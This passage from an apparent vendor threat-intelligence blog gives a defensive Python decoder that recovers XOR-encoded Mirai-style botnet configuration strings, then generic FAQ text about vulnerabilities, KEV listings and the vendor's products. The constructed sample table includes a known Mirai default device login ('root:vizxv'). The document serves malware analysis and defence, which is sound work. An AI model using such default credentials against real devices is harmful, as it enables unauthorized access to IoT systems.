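Both the Tuxnokill and Nexcorium write-ups above mention XOR-encoded configuration, the Mirai trait that lets an analyst pull C2 hosts, process names and credentials out of a sample without running it. The following is an added example, not Akamai's or Fortinet's tooling: a decoder that tries every single-byte key against a carved table region and ranks candidates by how much of the output looks like NUL-terminated text. Original Mirai's four-byte key 0xDEADBEEF reduces to the single byte 0x22; variants change it, which is why the decoder brute-forces. The sample table is constructed.

```python
"""Recover XOR-encoded Mirai-style configuration strings from a carved table.

Added example, not Akamai's or Fortinet's tooling. Works on a blob carved
from the binary's config/table region; the sample blob here is constructed.
"""
import re

TEXTLIKE = set(range(0x20, 0x7F)) | {0x00, 0x09, 0x0A, 0x0D}   # printable, NUL, tab, CR, LF


def mirai_table_key(key32=0xDEADBEEF):
    """Original Mirai XORs each table byte with k1 ^ k2 ^ k3 ^ k4 of its 32-bit key."""
    b = key32.to_bytes(4, "big")
    return b[0] ^ b[1] ^ b[2] ^ b[3]


def xor_bytes(data, key):
    return bytes(b ^ key for b in data)


def textlike_ratio(data):
    return sum(b in TEXTLIKE for b in data) / max(len(data), 1)


def strings_in(data, min_len=4):
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def recover_config(blob, min_ratio=0.85):
    """Try all 256 keys; return [(key, strings), ...] best candidate first.

    Ranking is by the number of NUL-terminated printable runs, then by the
    share of text-like bytes: a wrong key that merely shifts letters keeps the
    bytes printable but destroys the NUL separators a Mirai table relies on.
    """
    ranked = []
    for key in range(256):
        plain = xor_bytes(blob, key)
        ratio = textlike_ratio(plain)
        if ratio < min_ratio:
            continue
        runs = len(re.findall(rb"[\x20-\x7e]{3,}\x00", plain))
        ranked.append((runs, ratio, key, strings_in(plain)))
    ranked.sort(key=lambda r: (r[0], r[1]), reverse=True)
    return [(key, strs) for _, _, key, strs in ranked]


def make_sample_blob(key=0x54):
    """Constructed table: NUL-terminated entries as a Mirai-derived config might hold them."""
    entries = [b"c2.constructed.example:44300", b"/bin/busybox", b"admin", b"tuxnokill", b"root:vizxv"]
    return xor_bytes(b"\x00".join(entries) + b"\x00", key)


if __name__ == "__main__":
    best_key, strings = recover_config(make_sample_blob())[0]
    print(f"key=0x{best_key:02x} strings={strings}")
```

Against a real sample, carve the region between the last code section and the first obviously-encrypted data, or simply run the decoder over the whole .rodata section and take the top candidate; the C2 host and port it recovers are the indicators worth blocking and the process names are what to look for in ps output on a suspected device.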
What were the most trending OSS vulnerabilities this week?
Open-Source Software (OSS) vulnerabilities are security weaknesses discovered in publicly available codebases that can be exploited across widely used libraries, frameworks, and tools, often impacting thousands of downstream applications.
Were any PRE-NVD vulnerabilities identified this week?
PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.
Conclusion
The week’s activity reinforces that both legacy and newly disclosed vulnerabilities are actively exploited, often within hours of public disclosure, across enterprise and IoT environments. The continued abuse of KEV-listed flaws highlights persistent gaps in patching and exposure management. Concurrent malware campaigns further demonstrate how quickly vulnerabilities are operationalized into large-scale attacks. Leveraging platforms like Loginsoft Vulnerability Intelligence (LOVI) enables proactive detection, prioritization, and response to emerging threats before they escalate.
FAQs
1) What is SimpleHelp?
SimpleHelp is a Remote Monitoring and Management (RMM) platform used by managed service providers (MSPs) and IT teams to remotely access systems, deploy software, monitor endpoints, and provide technical support across distributed environments.
2) What is ConnectWise ScreenConnect?
ConnectWise ScreenConnect is a remote monitoring and management (RMM) solution that enables secure remote desktop access, system administration, and support across enterprise environments.
3) Does inclusion in the CISA KEV catalog mean exploitation is widespread?
Not necessarily widespread - but confirmed. KEV inclusion indicates verified in-the-wild exploitation. While the scale may vary, the operational reality is that threat actors possess working exploits, making patch prioritization urgent regardless of observed targeting volume.
4) How does LOVI help organizations manage vulnerabilities effectively?
Loginsoft Vulnerability Intelligence empowers you to efficiently prioritize and respond to potential vulnerabilities by focusing on those actively exploited in the wild. LOVI correlates vulnerability data with real-world threat activity to reduce noise and improve decision-making. This approach enables faster remediation and stronger security posture.
5) What is Cytellite?
Cytellite is a Loginsoft security intelligence platform that provides real-time visibility into emerging threats through a global sensor network. It delivers actionable IP intelligence to help organizations detect, analyze, and respond to attacks quickly. By correlating threat data with live activity, Cytellite strengthens resilience across dynamic threat landscapes.